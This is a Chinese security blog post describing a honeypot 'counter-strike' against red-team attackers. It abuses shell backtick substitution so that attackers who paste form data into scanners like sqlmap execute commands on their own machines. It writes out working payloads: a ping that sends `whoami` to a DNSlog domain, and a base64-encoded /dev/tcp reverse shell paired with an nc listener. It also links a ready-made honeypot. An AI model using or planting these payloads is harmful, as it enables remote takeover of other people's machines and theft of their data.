应用场景:
- 攻击队精神疲惫,掉以轻心,使用自动化漏扫并无对URL以及数据包进行过滤。
- 攻击队为技术欠缺的队伍,了解知识面比较少。
- 该利用方式,本质上与各种工具并无关系,而是使用了终端的特性进行反制。
利用场景:
Linux反引号特性
反引号这个字符所对应的键一般位于键盘的左上角,不要将其同单引号混淆。反引号括起来的字符串被shell解释为命令行,在执行时,shell首先执行该命令行,并以它的标准输出结果取代整个反引号(包括两个反引号)部分。
所以,终端执行流程
反引号->往前推的命令
例如:ping `ls`
┌──(root㉿kali)-[/]
└─# echo `ping`
ping: usage error: 需要目标地址
DNSlog
┌──(root㉿kali)-[/]
ping `whoami`.swwipozkje.dgrh3.cn.
PING root.swwipozkje.dgrh3.cn (139.198.11.227) 56(84) bytes of data.
64 bytes from 139.198.11.227 (139.198.11.227): icmp_seq=1 ttl=128 time=30.4 ms
bytes from 139.198.11.227: icmp_seq=2 ttl=128 time=22.5 ms
root.swwipozkje.dgrh3.cn ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 2139ms
rtt min/avg/max/mdev = 22.476/26.419/30.363/3.943 ms
可以看到反引号里面的内容,被终端所执行。
那么,利用此特性,我们可以进行什么操作呢?
NC进行反弹上线
┌──(chinaran㉿kali)-[~]
└─$ nc -lp 6618
监听本地6618端口
使用sqlmap进行模拟测试
sqlmap -u 'http://baidu.com/' --data "name=asho&id=45273434&query=shell`echo c2ggLWkgPiYgL2Rldi90Y3AvMTI3LjAuMC4xLzY2MTggMD4mMQ== | base64 -d|bash -i`&port=6379"
其中echo后面是经过base64编码后的shell执行内容,解码后为以下内容:
sh -i >& /dev/tcp/127.0.0.1/6618 0>&1
执行,查看nc,发现shll已经反弹
构造蜜罐,实现仿真效果
在真实环境中,我们可以在表单中添加很多杂七杂八垃圾数据,某些攻击队在心浮气躁的环境下会直接放进工具里面跑。
例如:
怎么搭建蜜罐并且仿真爬取网页,请看往期文章
总结:‘打战的时候长眼睛,别瞎点,使用带高亮的终端。’
本蜜罐环境下载地址:
https://github.com/ChinaRan0/jumpserver-miguan/
原文始发于微信公众号(知攻善防实验室):常见安全工具蜜罐反制上线[睁眼瞎版]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论